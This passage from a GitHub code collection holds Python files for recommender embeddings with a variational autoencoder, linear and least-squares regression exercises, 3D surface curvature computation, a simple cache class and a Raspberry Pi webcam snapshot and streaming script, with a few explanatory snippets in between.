name='encoder')\n self.latent_inputs = keras.Input(shape=(self.latentSize,), name='z_sampling')\n self.e5 = keras.layers.Dense(units=self.latentSize * 4)(self.latent_inputs)\n self.b5 = tf.keras.layers.BatchNormalization()(self.e5)\n self.r5 = tf.keras.layers.LeakyReLU(alpha=0.3)(self.b5)\n self.d5 = tf.keras.layers.Dropout(0.2, seed=42)(self.r5)\n self.output_layer = keras.layers.Dense(self.inputShape[0], activation='sigmoid')(self.d5)\n self.decoder = keras.Model(self.latent_inputs, self.output_layer, name='decoder')\n self.output_layer = self.decoder(self.encoder(self.input_layer)[2])\n self.vae = keras.Model(self.input_layer, self.output_layer, name='vae_mlp')\n\n def sampling(self, args):\n z_mean, z_log_sigma = args\n epsilon = K.random_normal(shape=(K.shape(z_mean)[0], self.latentSize),\n mean=0., stddev=0.1)\n return z_mean + K.exp(z_log_sigma) * epsilon\n\n def call(self, vector):\n z_mean, z_log_sigma, z = self.encoder(vector)\n reconstructed = self.decoder(z)\n kl_loss = -0.5 * tf.reduce_mean(\n z_log_sigma - tf.square(z_mean) - tf.exp(z_log_sigma) + 1\n )\n self.add_loss(kl_loss)\n self.add_metric(kl_loss, name='kl_loss', aggregation='mean')\n return reconstructed\n\n def 
createEmbedding(self, vector):\n return self.encoder(vector)\n\n\ndef simil_one_hot_mapping(df, column_1, column_2, column_index):\n assert type(column_1) == str and type(column_2) == str and type(column_index) == str\n assert column_1 in df.columns and column_2 in df.columns and column_index in df.columns\n cp = df.copy(deep=True)\n cp['mapping'] = cp[column_1].astype(str) + '-' + cp[column_2].astype(str)\n keys = list(cp['mapping'].unique())\n values = [v for v in range(len(keys))]\n mapping_dict = dict(zip(keys, values))\n cp['mapping'] = cp['mapping'].map(mapping_dict)\n cp.drop([column_1, column_2], axis=1, inplace=True)\n cp['value'] = 1\n cp = cp.pivot(index=column_index, columns='mapping', values='value')\n cp.fillna(value=0, inplace=True)\n cp.reset_index(inplace=True)\n return cp\n\n\ndef get_embeddings(dataset_df, epochs, batch_size, learning_rate, validation_split, latent_dim,\n patience_early, patience_reduce, path, one_hot=False):\n path = path.split('.csv')[0] + '_' + str(latent_dim) + '.csv'\n if os.path.exists(path):\n print('Embeddings already computed, reloading...')\n return pd.read_csv(path)\n print('Embeddings not computed, creating...')\n assert dataset_df.columns[0] == 'item_id'\n if not one_hot:\n dataset_df = simil_one_hot_mapping(dataset_df, 'feature_category_id', 'feature_value_id', 'item_id')\n dataset_tensor = tf.convert_to_tensor(dataset_df.copy(deep=True)[dataset_df.columns[1:]].values)\n auto_encoder = VariationalAutoEncoder(inputShape=(dataset_tensor.shape[1],),\n batchSize=batch_size,\n latentSize=latent_dim)\n auto_encoder.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate),\n loss=keras.losses.MeanSquaredError())\n callbacks = [\n tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=patience_early, restore_best_weights=True),\n tf.keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=patience_reduce, min_lr=1e-7,\n verbose=1, cooldown=0)]\n auto_encoder.fit(dataset_tensor, dataset_tensor,\n epochs=epochs,\n batch_size=batch_size,\n validation_split=validation_split,\n callbacks=[callbacks],\n verbose=1)\n encoded_df = pd.DataFrame(auto_encoder.createEmbedding(dataset_tensor)[2])\n encoded_df.insert(0, 'item_id', dataset_df.item_id)\n encoded_df.to_csv(path, index=False)\n return encoded_df\n\n\ndef compute_aggregation_score(item_list, aggregator, values):\n rows = values.loc[values.item_id.isin(item_list)]\n if aggregator == 'sum':\n return np.sum(np.array(rows[rows.columns[1:]]), axis=0)\n if aggregator == 'mean':\n return np.mean(np.array(rows[rows.columns[1:]]), axis=0)\n if aggregator == 'prod':\n return np.prod(np.array(rows[rows.columns[1:]]), axis=0)\n\n\ndef get_session_views_embeddings(sessions, dataset_path, latent_dim, aggregator, path):\n assert aggregator in ['sum', 'mean', 'prod']\n path = path.split('.csv')[0] + '_' + str(latent_dim) + '_' + str(aggregator) + '.csv'\n if os.path.exists(path):\n print('Embedding already computed, reloading...')\n return pd.read_csv(path)\n print('Embeddings not computed, creating...')\n item_features_df = pd.read_csv(dataset_path + 'Dataset/item_features.csv', sep=',')\n item_attributes = simil_one_hot_mapping(item_features_df, 'feature_category_id', 'feature_value_id', 'item_id')\n item_embeddings = get_embeddings(dataset_df=item_attributes[item_attributes.columns[:905]], epochs=200, batch_size=32,\n learning_rate=1e-3, validation_split=0.2, latent_dim=latent_dim, patience_early=10,\n patience_reduce=5, path='../../Dataset/item_embeddings.csv', 
one_hot=True)\n session_dict = sessions.groupby(['session_id'])['item_id'].progress_apply(lambda items:\n list(items.value_counts().index)).to_dict()\n session_scores_dict = {key: compute_aggregation_score(value, aggregator, item_embeddings)\n for key, value in tqdm(session_dict.items())}\n\n session_scores_df = pd.DataFrame.from_dict(session_scores_dict, orient='index')\n session_scores_df.reset_index(inplace=True)\n session_scores_df.rename(columns={session_scores_df.columns[0]: 'session_id'}, inplace=True)\n session_scores_df.to_csv(path, index=False)\n return session_scores_df\n","repo_name":"recsyspolimi/recsys-challenge-2022-dressipi","sub_path":"RecSys_Course_AT_PoliMi/Pipeline/attributes_utils.py","file_name":"attributes_utils.py","file_ext":"py","file_size_in_byte":12609,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
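To make the pivot inside `simil_one_hot_mapping` concrete, here is a tiny worked example (toy values, not project data):

    import pandas as pd

    toy = pd.DataFrame({
        'item_id': [1, 1, 2],
        'feature_category_id': [10, 20, 10],
        'feature_value_id': [100, 200, 100],
    })
    # '10-100' -> column 0, '20-200' -> column 1; each item row gets 1.0
    # where that (category, value) pair occurs and 0.0 elsewhere
    print(simil_one_hot_mapping(toy, 'feature_category_id', 'feature_value_id', 'item_id'))
    #    item_id    0    1
    # 0        1  1.0  1.0
    # 1        2  1.0  0.0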
+{"seq_id":"36987870360","text":"#%%\n# import libraries\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n#%%\n# read data\npath = 'ex1data1.txt'\ndata = pd.read_csv(path, header = None, names= ['Population', 'Profit'])\n\n#%%\n# show imported data details\n# print('data = \\n', data.head(10))\n# print('**************************************')\n# print('data.describe = \\n', data.describe())\n# print('**************************************')\n\n#%%\n# draw data\nfig, ax = plt.subplots(figsize= (6,6))\nplt.scatter(data['Population'], data['Profit'], marker= 'o', s= 12, label= 'Training data')\nax.set(title= 'Best Fit Line', xlabel= 'Population', ylabel= 'Profit')\n\n#%%\n# adding a new column called ones before the data\ndata.insert(0, 'Ones', 1)\n# print('new data = \\n', data.head(10))\n# print('**************************************')\n\n#%%\n# separate X (training data) from y (target variable)\ncols = data.shape[1]\nX = data.iloc[:, 0 : cols-1]\ny = data.iloc[:, cols-1 : cols]\n\n# print('X data = \\n', X.head(10))\n# print('**************************************')\n# print('y data = \\n', y.head(10))\n# print('**************************************')\n\n#%%\n# Convert data from data frames to numpy matrices\nX = np.matrix(X.values)\ny = np.matrix(y.values)\ntheta = np.matrix(np.array(np.zeros((cols-1, 1))))\n\n# print('X \\n', X)\nprint('X.shape = ', X.shape)\nprint('**************************************')\n# print('y \\n', y)\nprint('y.shape = ', y.shape)\nprint('**************************************')\n# print('theta \\n', theta)\nprint('theta.shape = ', theta.shape)\nprint('**************************************')\n\n#%%\n# Cost function\ndef computeCost(X, y, theta):\n J = np.sum(np.power(((X * theta) - y), 2)) / (2 * len(y))\n return float(J)\n\nprint('With theta = [0 : 0]\\nCost computed =', computeCost(X, y, theta))\nprint('Expected cost value (approx) 32.07')\nprint('**************************************')\nprint('With theta = [-1 : 2]\\nCost computed =', computeCost(X, y, np.array([[-1],[2]])))\nprint('Expected cost value (approx) 54.24')\nprint('**************************************')\n\n#%%\n# Running Gradient Descent\ndef gradientDescent(X, y, theta, alpha, num_iters):\n temp = np.matrix(np.zeros(theta.shape))\n J_history = np.zeros((num_iters, 1))\n \n for i in range(num_iters):\n for j in range(len(theta)):\n temp[j, 0] = theta[j, 0] - ((alpha / len(y)) * np.sum(np.multiply(((X * theta) - y), X[:, j])))\n \n theta = temp.copy()\n J_history[i] = computeCost(X, y, theta)\n \n return theta, J_history\n\niterations = 1500\nalpha = 0.01\n\ntheta, J_history = gradientDescent(X, y, theta, alpha, iterations)\n\nprint('Theta found by gradient descent:\\n', theta[0,0], '\\n ', theta[1,0])\nprint('Expected theta values (approx)\\n -3.6303\\n 1.1664')\nprint('**************************************')\n# print('J_history\\n', J_history)\n# print('**************************************')\n\n#%%\n# Plot the linear fit\nplt.plot(X[:, 1], X*theta, 'r-', linewidth= 1.5, label= 'Linear regression')\nplt.legend()\n\n#%%\n# Predict values for population sizes of 35,000 and 70,000\npredict1 = [1., 3.5] * theta\nprint('For population = 35,000, we predict a profit of %f' %(predict1 * 10000))\npredict2 = [1., 7.] 
* theta\nprint('For population = 70,000, we predict a profit of %f' %(predict2 * 10000))\nprint('**************************************')\n\n#%%\n# draw error graph\nfig, ax = plt.subplots(figsize=(6,6))\nax.plot(np.arange(1, iterations+1), J_history, 'r', linewidth=2)\nax.set(xlabel= 'No. of Iterations', ylabel= 'Cost', title= 'Error vs. Training Epoch')\n\n#%%\n# Visualizing J(theta_0, theta_1)\n\n# Grid over which we will calculate J\ntheta0_vals = np.linspace(-10, 10, 100)\ntheta1_vals = np.linspace(-1, 4, 100)\n\n# initialize J_vals to a matrix of 0's\nJ_vals = np.zeros((len(theta0_vals), len(theta1_vals)))\n\n# Fill out J_vals\nfor i in range(len(theta0_vals)):\n for j in range(len(theta1_vals)):\n t = np.array([[theta0_vals[i]], [theta1_vals[j]]])\n J_vals[i,j] = computeCost(X, y, t)\n \nJ_vals = J_vals.T\ntheta0_vals, theta1_vals = np.meshgrid(theta0_vals, theta1_vals)\nfig, ax = plt.subplots(figsize= (7,7), subplot_kw={'projection' : '3d'})\nax.plot_surface(theta0_vals, theta1_vals, J_vals, cmap= 'jet')\n# ax.view_init(0,90)\nax.set(xlabel= '$\\mathrm{\\\\theta_{0}}$', ylabel= '$\\mathrm{\\\\theta_{1}}$', zlabel= 'Cost Function $\\mathrm{J(\\\\theta)}$')\nplt.plot(theta[0,0], theta[1,0], 'rx', markersize=10, linewidth=2)","repo_name":"xAbdalla/Machine_Learning_Exercises-Stanford_University","sub_path":"Python/ex1/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
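The per-parameter loop in `gradientDescent` can be collapsed into a single matrix update; a vectorized equivalent of the same math (same `X`, `y`, `theta` shapes as above, so it drops straight into this script):

    def gradientDescentVectorized(X, y, theta, alpha, num_iters):
        J_history = np.zeros((num_iters, 1))
        for i in range(num_iters):
            # simultaneous update: theta <- theta - (alpha/m) * X^T (X theta - y)
            theta = theta - (alpha / len(y)) * (X.T * ((X * theta) - y))
            J_history[i] = computeCost(X, y, theta)
        return theta, J_history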
+{"seq_id":"16396095209","text":"'''\nm = n* sum(x*y) - sum(x)-sum(y) / n*sum(x**2) - sum(x) **2\n\nb = sum(y) - m*sum(x) / n\n\nn : representa el valor de la cantidad de datos que nos dan\n\nm : pendiente de nuestra ecuacion lineal\n\nb : valor de origen de coordenadas\n\n\n\n'''\n\n\n\n\n\nimport pandas as pd\nimport numpy as np\nimport sympy \n\nx = sympy.Symbol('x')\n\n# datos: lista de valores (x, y)\ndef min_cuadrado(lista_x, lista_y):\n\n if len(lista_x) != len(lista_y):\n print(\"Las longitudes de la listas no son iguales\")\n else:\n n = len(lista_x)\n #convierto a tipo Numpy las listas dadas por parametro, ya que es mas\n #facil de laburar\n values_x = np.array(lista_x)\n values_y = np.array(lista_y)\n\n\n #calculo las sumatorias\n sum_x = np.sum(values_x)\n sum_y = np.sum(values_y)\n sum_xy = np.sum(values_x*values_y)\n sum_x_x = np.sum(values_x*values_x)\n\n\n #utilizo las formulas para obtener 'm' y 'b'\n #m = n* sum(x*y) - sum(x)-sum(y) / n*sum(x**2) - sum(x) **2\n \n m = ((n * sum_xy) - (sum_x * sum_y)) / ((n * sum_x_x) - (sum_x**2))\n \n #b = sum(y) - m*sum(x) / n\n\n b = (sum_y - m * sum_x) / n\n\n\n return(m * x) + b\n\n\n\nlista_x = [1, 2, 3, 4]\nlista_y = [1.4, 1.1, 0.7, 0.1]\n\n\necuacion = min_cuadrado (lista_x, lista_y)\nprint(ecuacion)\n","repo_name":"T0p2/Practica-de-lenguajes","sub_path":"Practica_nueva/Metodo_min_cuadrado.py","file_name":"Metodo_min_cuadrado.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"33853568379","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n ©\n Author: Karim Makki\n\"\"\"\n\nimport trimesh\nimport numpy as np\nimport nibabel as nib\nimport os\nfrom scipy.ndimage.filters import gaussian_filter\nimport argparse\nimport skfmm\nfrom skimage import measure\nimport timeit\nimport fast_Gaussian_curvature_3D as g3D\n\n\n### Distance calculation limited to narrow band\n\ndef phi_narrow(mask, band=5):\n\n tmp = np.ones(mask.shape)\n tmp[mask!=0]= -1\n sgd = np.array(skfmm.distance(tmp, narrow=band), float)\n R = np.where(sgd != 0)\n sgd[sgd == 0] = 1\n\n return sgd, R\n\ndef local_gaussian_filter(scalar_function, sigma=2):\n\n mask = np.zeros(scalar_function.shape)\n mask[scalar_function!=0] = 1\n smooth_scalar_function = gaussian_filter(scalar_function*mask, sigma=sigma)\n\n return smooth_scalar_function\n\ndef hessian_adjoint_narrowband(hessian,R):\n\n Ha = np.zeros(hessian.shape)\n Ha[0,0,R[0],R[1],R[2]] = hessian[1,1,R[0],R[1],R[2]]*hessian[2,2,R[0],R[1],R[2]] - hessian[1,2,R[0],R[1],R[2]]*hessian[2,1,R[0],R[1],R[2]]\n Ha[0,1,R[0],R[1],R[2]] = hessian[1,2,R[0],R[1],R[2]]*hessian[2,0,R[0],R[1],R[2]] - hessian[1,0,R[0],R[1],R[2]]*hessian[2,2,R[0],R[1],R[2]]\n Ha[0,2,R[0],R[1],R[2]] = hessian[1,0,R[0],R[1],R[2]]*hessian[2,1,R[0],R[1],R[2]] - hessian[1,1,R[0],R[1],R[2]]*hessian[2,0,R[0],R[1],R[2]]\n\n Ha[1,0,R[0],R[1],R[2]] = hessian[0,2,R[0],R[1],R[2]]*hessian[2,1,R[0],R[1],R[2]] - hessian[0,1,R[0],R[1],R[2]]*hessian[2,2,R[0],R[1],R[2]]\n Ha[1,1,R[0],R[1],R[2]] = hessian[0,0,R[0],R[1],R[2]]*hessian[2,2,R[0],R[1],R[2]] - hessian[0,2,R[0],R[1],R[2]]*hessian[2,0,R[0],R[1],R[2]]\n Ha[1,2,R[0],R[1],R[2]] = hessian[0,1,R[0],R[1],R[2]]*hessian[2,0,R[0],R[1],R[2]] - hessian[0,0,R[0],R[1],R[2]]*hessian[2,1,R[0],R[1],R[2]]\n\n Ha[2,0,R[0],R[1],R[2]] = hessian[0,1,R[0],R[1],R[2]]*hessian[1,2,R[0],R[1],R[2]] - hessian[0,2,R[0],R[1],R[2]]*hessian[1,1,R[0],R[1],R[2]]\n Ha[2,1,R[0],R[1],R[2]] = hessian[1,0,R[0],R[1],R[2]]*hessian[0,2,R[0],R[1],R[2]] - hessian[0,0,R[0],R[1],R[2]]*hessian[1,2,R[0],R[1],R[2]]\n Ha[2,2,R[0],R[1],R[2]] = hessian[0,0,R[0],R[1],R[2]]*hessian[1,1,R[0],R[1],R[2]] - hessian[0,1,R[0],R[1],R[2]]*hessian[1,0,R[0],R[1],R[2]]\n\n return Ha\n\n\ndef L2_norm_grad_narrowband(gx,gy,gz,R):\n\n norm_grad = np.zeros(gx.shape)\n norm_grad[R] = np.sqrt(gx[R]**2 + gy[R]**2 + gz[R]**2)\n norm_grad = local_gaussian_filter(norm_grad, sigma=1)\n norm_grad[np.where(norm_grad==0)]=1 # just to avoid dividing by zero\n\n return norm_grad\n\ndef hessian_trace_narrowband(hessian,R):\n\n return hessian[0,0,R[0],R[1],R[2]] + hessian[1,1,R[0],R[1],R[2]] + hessian[2,2,R[0],R[1],R[2]]\n\n\ndef curvatures_narrowband(phi_grad,Ha,hessian,R):\n\n gx, gy, gz = phi_grad\n norm = L2_norm_grad_narrowband(gx,gy,gz,R)\n gx /= norm\n gy /= norm\n gz /= norm\n\n gaussian_curv = np.zeros(gx.shape)\n mean_curv = np.zeros(gx.shape)\n\n gaussian_curv[R] = gx[R] * (gx[R]*Ha[0,0,R[0],R[1],R[2]]+gy[R]*Ha[1,0,R[0],R[1],R[2]]+\\\n gz[R]*Ha[2,0,R[0],R[1],R[2]]) + gy[R] *(gx[R]*Ha[0,1,R[0],R[1],R[2]]+gy[R]*\\\n Ha[1,1,R[0],R[1],R[2]]+gz[R]*Ha[2,1,R[0],R[1],R[2]])+ gz[R] * (gx[R]*Ha[0,2,R[0],R[1],R[2]]\\\n +gy[R]*Ha[1,2,R[0],R[1],R[2]]+gz[R]*Ha[2,2,R[0],R[1],R[2]])\n\n gaussian_curv[R] /= L2_norm_grad_narrowband(gx,gy,gz,R)[R]**4\n\n mean_curv[R] = (gx[R] * (gx[R]*hessian[0,0,R[0],R[1],R[2]]+gy[R]*hessian[1,0,R[0],R[1],R[2]]+gz[R]*hessian[2,0,R[0],R[1],R[2]]) + \\\n gy[R] * (gx[R]*hessian[0,1,R[0],R[1],R[2]]+gy[R]*hessian[1,1,R[0],R[1],R[2]]+gz[R]*hessian[2,1,R[0],R[1],R[2]])\\\n + gz[R] * 
(gx[R]*hessian[0,2,R[0],R[1],R[2]]+gy[R]*hessian[1,2,R[0],R[1],R[2]]+gz[R]*hessian[2,2,R[0],R[1],R[2]])) \\\n - (L2_norm_grad_narrowband(gx,gy,gz,R)[R]**2 * hessian_trace_narrowband(hessian,R))\n\n mean_curv[R] /= -2*L2_norm_grad_narrowband(gx,gy,gz,R)[R]**3\n\n return gaussian_curv, mean_curv\n\ndef principal_curvatures(K_M, K_G):\n\n tmp = np.sqrt(np.absolute(K_M**2- K_G))\n k1 = K_M - tmp\n k2 = K_M + tmp\n\n return k1, k2\n\n\ndef save_result(verts,curv,save_path):\n\n res = np.append(verts,curv[...,None],axis=1)\n np.save(save_path, res)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-in', '--mask', help='3D shape binary mask, as NIFTI file', type=str, required = True)\n parser.add_argument('-o', '--output', help='output directory', type=str, default = './Gaussian_curvature_results3D')\n\n args = parser.parse_args()\n\n # Example of use : python3 curvatures_narrowband.py -in ./3D_data/stanford_bunny_binary.nii.gz -o /home/karim/Bureau/Courbure/narrow_band\n\n output_path = args.output\n\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n shape = nib.load(args.mask).get_data()\n\n start_time = timeit.default_timer()\n\n shape, dx, dy, dz = g3D.bbox_3D(shape,5)\n\n phi, R = phi_narrow(shape,5) ## distance calculation limited to narrow band\n phi = local_gaussian_filter(phi, sigma=2) ## smoothing of the level set signed distance function on a narrow band\n\n#################### Computation of Gaussian and mean curvatures ###############################\n phi_grad, hessian = g3D.hessian(phi) ### To do in narrowband\n Ha = hessian_adjoint_narrowband(hessian,R)\n Gaussian_curvature, mean_curvature = curvatures_narrowband(phi_grad,Ha,hessian,R)\n#################################################################################################\n#################### Computation of principal curvatures #######################################\n K1, K2 = principal_curvatures(mean_curvature, Gaussian_curvature)\n#################################################################################################\n # extract explicitly the implicit surface mesh using the scikit-image toolbox\n\n verts, faces, normals, values = measure.marching_cubes_lewiner(phi, 0.0)\n print(verts.shape)\n\n ### Affect per-vertex curvature values, with a nearest neighbour interpolation of vertices on the grid\n gaussian_curv = g3D.texture_spline_interpolation3D(verts, Gaussian_curvature)\n mean_curv = g3D.texture_spline_interpolation3D(verts, mean_curvature)\n k1 = g3D.texture_spline_interpolation3D(verts, K1)\n k2 = g3D.texture_spline_interpolation3D(verts, K2)\n\n elapsed = timeit.default_timer() - start_time\n print(\"The proposed method takes (in seconds):\\n\")\n print(elapsed)\n\n verts = g3D.align_origin_back(verts,dx,dy,dz)\n m = trimesh.Trimesh(vertices=verts, faces=faces)\n m.export(os.path.join(output_path, \"surface_mesh.obj\"))\n\n #### Save results as numpy array arrays\n\n save_result(verts,gaussian_curv,os.path.join(output_path,\"gaussian_curv.npy\"))\n save_result(verts,mean_curv,os.path.join(output_path,\"mean_curv.npy\"))\n save_result(verts,k1,os.path.join(output_path,\"min_curv.npy\"))\n save_result(verts,k2,os.path.join(output_path,\"max_curv.npy\"))\n save_result(verts,2*gaussian_curv,os.path.join(output_path,\"Ricci_scalar.npy\"))\n\n ## Display results\n\n g3D.display_mesh(verts, faces, normals, gaussian_curv, os.path.join(output_path, \"Gaussian_curvature_Makki.png\"))\n g3D.display_mesh(verts, faces, normals, 2*gaussian_curv, 
os.path.join(output_path, \"Ricci_scalar_Makki.png\"))\n g3D.display_mesh(verts, faces, normals, mean_curv, os.path.join(output_path, \"mean_curvature_Makki.png\"))\n g3D.display_mesh(verts, faces, normals, k1, os.path.join(output_path, \"Minimum_curvature_Makki.png\"))\n g3D.display_mesh(verts, faces, normals, k2, os.path.join(output_path, \"Maximum_curvature_Makki.png\"))\n","repo_name":"k16makki/Medima_tools","sub_path":"curvatures_narrowband.py","file_name":"curvatures_narrowband.py","file_ext":"py","file_size_in_byte":7523,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
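A quick numerical sanity check of the level-set formulas (not part of the original script; sign conventions differ between references, but with K_M = 0.5 * div(grad(phi)/|grad(phi)|) a sphere of radius R should give mean curvature close to 1/R near the zero level set):

    import numpy as np

    n, R = 64, 20.0
    ax = np.arange(n) - n / 2
    x, y, z = np.meshgrid(ax, ax, ax, indexing='ij')
    phi = np.sqrt(x**2 + y**2 + z**2) - R  # signed distance to a sphere

    gx, gy, gz = np.gradient(phi)
    norm = np.sqrt(gx**2 + gy**2 + gz**2)
    norm[norm == 0] = 1
    mean_curv = 0.5 * (np.gradient(gx / norm, axis=0)
                       + np.gradient(gy / norm, axis=1)
                       + np.gradient(gz / norm, axis=2))

    shell = np.abs(phi) < 1.0
    print(mean_curv[shell].mean(), 1.0 / R)  # the two should be close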
+{"seq_id":"72235041503","text":"from lib.loggers import Logger\n\nlogger = Logger()\n\n\nclass Cache(dict):\n DEBUG = False\n\n def __str__(self):\n representation = (\n \"{ \" + \", \".join([f\"'{key}': ...\" for key in self.keys()]) + \"}\"\n )\n\n return representation\n\n def delete(self, key: str) -> None:\n if self.DEBUG:\n logger.info(f\"Deleting key '{key}' from cache.\")\n\n del self[key]\n","repo_name":"asynched/search-engine-api","sub_path":"src/lib/cache/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"21309595496","text":"import sys\nimport configparser\nimport logging\nimport os\nimport requests\nimport smtplib\nimport picamera\nfrom time import sleep\nfrom email.mime.text import MIMEText\nimport RPi.GPIO as GPIO\nimport time\nfrom datetime import datetime, time\nimport subprocess\nimport socket\nimport threading\nfrom threading import Thread\nimport shutil\n\nconfig = configparser.ConfigParser()\nconfig.read('webcam.ini')\n\nlogger = logging.getLogger(__name__)\nhandler = logging.FileHandler(config['DEFAULT']['log.file'])\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\nlogger.addHandler(logging.StreamHandler())\nlogger.setLevel(logging.ERROR)\nsnapshot_interval = int(config['DEFAULT']['camera.snapshot.interval'])\n\nclass Webcam:\n\n def get_file_ip_address(self):\n file_name = 'ipaddress'\n if os.path.isfile(file_name):\n file = open('ipaddress', 'r')\n ip_address = file.read()\n file.close()\n logger.debug('file ip address is %s' % ip_address)\n return ip_address\n\n def set_file_ip_address(self, ip_address):\n file_name = 'ipaddress'\n if os.path.isfile(file_name):\n file = open('ipaddress', 'w')\n file.write(ip_address)\n file.close()\n logger.info('changed file ip address to %s' % ip_address)\n\n def get_router_ip_address(self):\n request = requests.get('http://ipecho.net/plain')\n if request.status_code == 200:\n ip_address = request.text\n logger.debug('router ip address is %s' % ip_address)\n return ip_address\n\n def send_email(self, subject, message):\n fromaddr = config['DEFAULT']['mail.from']\n toaddrs = config['DEFAULT']['mail.to']\n\n msg = MIMEText(message)\n msg['Subject'] = subject\n msg['From'] = fromaddr\n msg['To'] = toaddrs\n\n username = config['DEFAULT']['smtp.username']\n password = config['DEFAULT']['smtp.password']\n\n server = smtplib.SMTP(\"smtp.gmail.com\", 587)\n server.starttls()\n server.login(username, password)\n server.sendmail(fromaddr, toaddrs, msg.as_string())\n server.quit()\n\n def update_noip(self, ip_address):\n url = 'https://dynupdate.no-ip.com/nic/update?hostname=%s&myip=%s' % (config['DEFAULT']['noip.hostname'], ip_address)\n headers = {'Authorization': 'Basic %s' % config['DEFAULT']['noip.authorization'], 'User-Agent': '%s' % config['DEFAULT']['noip.useragent']}\n request = requests.get(url, headers=headers)\n if request.status_code == 200:\n logger.info('changed no-ip address to %s' % ip_address)\n return True\n else:\n logger.error('problem updating no-ip address: %s' % request.text)\n return False\n\n def start_camera(self):\n camera = picamera.PiCamera()\n camera.resolution = (1024, 768)\n camera.exposure_mode = 'sports'\n camera.vflip = True\n camera.exposure_mode = 'auto'\n camera.metering = 'average'\n sleep(3)\n\n snapshot = Snapshot(camera)\n snapshot.start()\n\n stream_server = StreamServer(camera)\n stream_server.start()\n\nclass Snapshot(Thread):\n\n def __init__(self, camera):\n Thread.__init__(self)\n self.camera = camera\n\n def run(self):\n\n while True:\n now = datetime.now()\n now_time = now.time()\n if now_time >= time(6,00) and now_time <= time(21,30):\n timestamp = now.strftime('%m/%d %H:%M:%S')\n timestamp += \" (\" + self.get_temp() + \")\"\n self.camera.annotate_text = timestamp\n\n try:\n if self.camera.recording:\n logger.debug('take snapshot using video port')\n self.camera.capture('/var/www/html/camera.jpg', use_video_port=True)\n else:\n logger.debug('take snapshot')\n 
self.camera.capture('/var/www/html/camera.jpg')\n\n shutil.copy('/var/www/html/camera.jpg', '/var/www/html/timelapse/camera-%s.jpg' % now.strftime('%Y-%m-%d_%H:%M:%S'))\n except:\n logger.error('unexpected snapshot error: ', sys.exc_info()[0])\n\n sleep(snapshot_interval)\n\n def get_temp(self):\n try:\n output = subprocess.check_output([\"/opt/vc/bin/vcgencmd\", \"measure_temp\"])\n text = output.decode('utf-8')\n return text[5:-3]\n except:\n return \"\"\n\nclass StreamServer(Thread):\n\n def __init__(self, camera):\n Thread.__init__(self)\n self.camera = camera\n\n def run(self):\n logger.info('stream server is started')\n\n server_socket = socket.socket()\n server_socket.bind(('0.0.0.0', 8000))\n server_socket.listen(0)\n\n try:\n while True:\n logger.debug('waiting for connection')\n connection = server_socket.accept()[0]\n\n logger.debug('create stream')\n stream = Stream(self.camera, connection)\n stream.start()\n finally:\n logger.info('stream server is stopped')\n server_socket.close()\n\nclass Stream(Thread):\n\n def __init__(self, camera, connection):\n Thread.__init__(self)\n self.camera = camera\n self.connection = connection\n\n def run(self):\n logger.debug('start recording')\n file = self.connection.makefile('wb')\n self.camera.start_recording(file, format='h264')\n\n try:\n while True:\n self.camera.wait_recording(60)\n except (ConnectionResetError):\n logger.warn('connection reset error')\n self.camera.stop_recording()\n except:\n logger.error('unexpected streaming error: ', sys.exc_info()[0])\n self.camera.stop_recording()\n self.connection.close()\n file.close()\n","repo_name":"jeffjohnston/webcam","sub_path":"webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":6049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
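The methods above are never wired together in this file; a plausible main-loop sketch (hypothetical, not from the original: the dynamic-DNS check runs once, then the camera threads take over):

    webcam = Webcam()
    router_ip = webcam.get_router_ip_address()
    if router_ip and router_ip != webcam.get_file_ip_address():
        # the router's public address changed: update No-IP and notify
        if webcam.update_noip(router_ip):
            webcam.set_file_ip_address(router_ip)
            webcam.send_email('IP address changed', 'New address: %s' % router_ip)
    webcam.start_camera()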
